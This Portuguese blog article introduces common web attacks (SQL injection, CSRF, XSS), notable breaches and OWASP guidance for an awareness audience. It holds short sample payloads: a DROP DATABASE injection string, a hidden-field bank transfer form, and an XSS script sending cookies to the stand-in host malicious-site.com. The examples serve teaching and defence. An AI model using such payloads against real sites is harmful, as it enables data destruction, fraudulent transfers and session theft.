A segurança das nossas aplicações web desempenham um papel crucial na proteção de dados sensíveis e na construção da confiança dos utilizadores. Neste artigo, conheça quais os tipos de ataque mais comuns, que riscos pode estar a correr e como os pode evitar.
No momento atual, em que a tecnologia desempenha um papel fundamental nas nossas vidas, a segurança das aplicações web tornaram-se uma prioridade inegável.
Desde que nascemos que temos acesso a um tablet, telemóvel ou computador e passamos horas e horas a fio na internet, um lugar complexo e interessante, cheio de informações e desinformações.
Hoje, exploraremos como a segurança das nossas aplicações web desempenham um papel crucial na proteção de dados sensíveis e na construção da confiança dos utilizadores.
Neste artigo, vou elucidar-lo um pouco mais sobre o mundo que tanto usamos que é a internet, um mundo que não é desprovido de perigo se não soubermos proteger-nos!
O Cenário Atual
Poderá ficar surpreendido mas existem muitos sites que, ao dia de hoje, estão cheios de vulnerabilidades que uma pessoa com más intenções poderá querer abusar.
Não se consegue dizer ao certo quantos sites estão expostos, devido ao extenso ecossistema e complexidade da web, mas poderão ser feitas aproximações. Um estudo feito pela organização OWASP, em 2021, demonstrou que existe uma alta percentagem de sites que estão expostos a diversos tipos de ataques:
Imagem retirada de: https://www.researchgate.net/figure/Percentage-probability-of-websites-vulnerable-by-different-class-of-cyber-vulnerabilities_fig1_279869021
Tipos de Ataques
SQL Injection – Injeção de Comandos SQL (Base de Dados)
Imagine que somos os únicos desenvolvedores de uma página web para venda de champôs . Temos uma base de dados com 1.000.000 de utilizadores registados e aparecemos em todas as revistas de moda do país.
Tudo corre bem até ao dia em que deixa de correr. Por tristeza nossa, não fazemos validações de injeções de comandos sql e, quando um utilizador menos bem intencionado vai registar-se, coloca no campo do “Nome do Utilizador” o seguinte texto : “DROP DATABASE IF EXISTS mydatabase;”
DROP DATABASE IF EXISTS mydatabase é um comando SQL que, ao ser executado, vai apagar por completo a base de dados “mydatabase”. A partir daí não tem volta a dar. Perdemos toda a informação que tínhamos do nosso querido site e, consequentemente, o nosso trabalho.
Cross-site Request Forgery (CSRF)
Este tipo de ataque informático acontece quando entramos em um site malicioso, chamar-lhe-emos A, e clicamos num link, fazendo pedidos para um site B. Eis um exemplo concreto:
O nosso amigo envia-nos um link meio suspeito pelo WhatsApp. Enviou a mensagem “CLICK HERE TO GET BITCOIN FREE HACK!!”.
Dentro do site existe um grande botão vermelho a dizer “CLICK HERE FOR MONEY”.
Com a esperança de nos tornarmos tão ricos quanto o Elon Musk, acabamos por clicar no link.
O problema é que teve o efeito contrário porque o botão vai transferir todo dinheiro que temos para uma outra conta. Eis o HTML do link que acabámos de carregar:
<form action=”https://bank.com/transfer” method=”POST”>
<input type=”hidden” name=”toAccount” value=”PT501234″>
<input type=”hidden” name=”amount” value=”1000 €”>
<input type=”submit” value=”CLICK HERE FOR MONEY”>
</form>
Como temos sessão iniciada no nosso banco, o site pensará que somos nós a fazer o pedido para fazer a transferência.
E com um simples clique ficámos mais longe de nos tornarmos o próximo bilionário.
Ficou claro porque não devemos andar a clicar em links aleatórios na internet?
Cross-site Scripting (XSS)
Imagine que temos um blog de sucesso com milhões de leitores, quase tão bom como o blog da KWAN. Temos um sistema de comentários em que um utilizador pode deixar um comentário sobre o blog.
Pessoas normais escrevem pequenos comentários como “adorei”, “achei bastante interessante”.
Mas existem também pessoas que escrevem comentários como:
<script>
var img = new Image();
img.src = ‘https://malicious-site.com/steal?cookie=’ + document.cookie;
</script>
Isto é código javascript, não é um comentário normal. Mas qual é o problema?
O comentário foi registrado. Agora, quando um utilizador tentar acessar o blog, carregará o script malicioso como um simples “comentário”.
O problema é que o comentário é código javascript. Vai ser executado no browser do utilizador. Só Deus sabe o que acontece a seguir. Mas ter código desconhecido a ser executado na máquina de um qualquer utilizador só pode ser mau sinal…
No exemplo dado irá enviar a informação de um cookie para “malicious-site.com”.
Isto é potencialmente perigoso pois dentro do cookie poderá ter a informação de sessão do utilizador, possibilitando que o hacker entre na conta dele. No final das contas, só porque o site não estava protegido contra injeção de scripts, todos os que abrirem a página do blog terão a sua conta comprometida.
Casos Conhecidos dos Famosos da Área Tecnológica
São inúmeros os casos de sites que, de uma forma ou de outra, foram comprometidos. Facebook, Twitter, GitHub, Yahoo, LinkedIn, só para nomear alguns.
Ninguém está protegido deste tipo de situações, nem mesmo os ‘gigantes’ da área tecnológica.
Em 2019, o Facebook enfrentou um ENORME vazamento de informação sensível, expondo até cerca de 533 milhões de utilizadores. A informação acabou por ser exposta em fóruns de hacking.
Em 2021, atacantes descobriram uma API pública sem autenticação que fornecia informações dos utilizadores da plataforma. Utilizaram-na para retirar a informação de mais de 700 milhões de utilizadores – cerca de 92% de todos os utilizadores do LinkedIn. Mais tarde esta informação foi colocada à venda no mercado negro.
A Internet como Arma de Guerra
Ataques informáticos podem ter o alcance e causar o mesmo estrago que uma arma de guerra. A única diferença é que não existe uma invasão física de um país. São imensos os relatos destes ataques e para os mais interessados no assunto vou deixar as histórias que achei mais interessantes.
Stuxnet
Programa informático utilizado para prejudicar instalações nucleares (amplamente acreditado que tenha sido feito pelos Estados Unidos e Israel para atacar o Irão).
WannaCry
Programa utilizado para encriptar e tornar inacessíveis os ficheiros dos computadores infetados. Houve acontecimentos de atacantes que infetaram computadores de hospitais e pediam resgates em bitcoin para tirar o vírus do sistema. Como resultado disso, houve adiamento de tratamentos, o que pôs em causa a saúde dos utentes.
Passwords e Autenticações: Cuidado!
Leaks
Existe um site bastante famoso que recolhe toda a informação de todos os leaks que foram registados sobre roubo de informação sensível dado um certo email: https://haveibeenpwned.com/
Aconselho a que dê vista de olhos, pois é bem possível que um site que tivesse usado em criança tenha sido comprometido e a sua password esteja à venda no mercado negro ????.
Não é o fim do mundo, na maioria dos casos é feito o hash da password.
Passwords
Também existe a informação de quais são as passwords mais comuns nos sites. No site https://nordpass.com/most-common-passwords-list/ conseguem ver esta informação.
Filtrem por país, e vão encontrar que a password mais comum em Portugal é “123456”.
Deezer
Existe um site de músicas chamado Deezer. Este site tem um sistema de subscrição em que, ao ter conta premium, podemos instalar as músicas para o nosso computador.
Até aqui tudo bem, o problema é que eles falham um princípio fulcral de segurança: expirações de tokens.
Quando fazemos um login no site é gravado um token no nosso browser – isto é a forma como o site sabe que estamos autenticados ou não.
Todas as subsequentes ações que façamos no site, que poderão necessitar de autenticação, usarão este token como autenticador.
O problema é que o token do Deezer tem uma validade anual – isto não é de todo uma boa prática. O utilizador consegue ver e alterar este token. E se um utilizador tiver acesso ao token de outro utilizador, este pode ser utilizado para fazer ações que necessitem de autenticação, como instalar músicas.
Isso é um autêntico mercado. Existem pessoas que vendem tokens para ter acesso à versão premium do website.
Isto seria facilmente resolvido se houvesse um sistema de mudança sistemática do token a encurtar a validade do token.
Será que Existe Solução?
Claro que sim, mas é algo que tem que ser trabalhado. Como Bruce Schneier dizia, “segurança é um processo, não um produto.”
É uma área em constante evolução e não existe uma solução única para todos os problemas.
O nosso melhor amigo? A INFORMAÇÃO.
Seguir as melhores práticas e medidas de segurança que existem é, sem dúvida, o melhor passo a se tomar.
Existem várias fontes de informação sobre o tema, mas a mais conhecida e usada é a OWASP.
O OWASP é uma organização não governamental com o objetivo de promover a segurança do software. Disponibiliza ferramentas, documentação, projetos e treino, um grande auxílio para tornarmo-nos melhores profissionais e nos ajudar a defender deste tipo de problemas.
Existe ainda um top 10 de vulnerabilidades mais comuns nos sites, que é divulgado pelo OWASP, e cuja leitura aconselho a todos os programadores dedicados a desenvolvimento web, sendo o mais recente o de 2021.
Cibersegurança: Tipos de Ataques Online & Boas Práticas – Considerações Finais
Em um mundo tão dependente da internet – é estimado que 99% dos telemóveis do Brasil tenham Whatsapp – ter conhecimentos sobre cibersegurança é essencial!
O cenário atual revela que muitos sites ainda estão vulneráveis, conforme indicado por estudos, ressaltando a urgência de implementar medidas robustas de segurança. Inclusive, neste artigo discutimos casos notáveis de violações de segurança em plataformas conhecidas, como Facebook e LinkedIn, destacando que até mesmo gigantes da tecnologia não estão imunes a essas ameaças.
Para enfrentar esses desafios em constante evolução, enfatizo a importância da informação e o papel fundamental da OWASP como uma fonte valiosa de diretrizes e melhores práticas de segurança.
À medida que avançamos no entendimento da cibersegurança, no próximo artigo irei aprofundar ainda mais este tema. Exploraremos novas ameaças, técnicas de proteção avançadas e atualizações nas tendências de cibersegurança. Estejam preparados para desvendar os segredos de práticas avançadas de cibersegurança e descobrir como proteger efetivamente seus sistemas contra as ameaças digitais em evolução. Para já, aconselho a leitura desse artigo sobre DevSecOps.
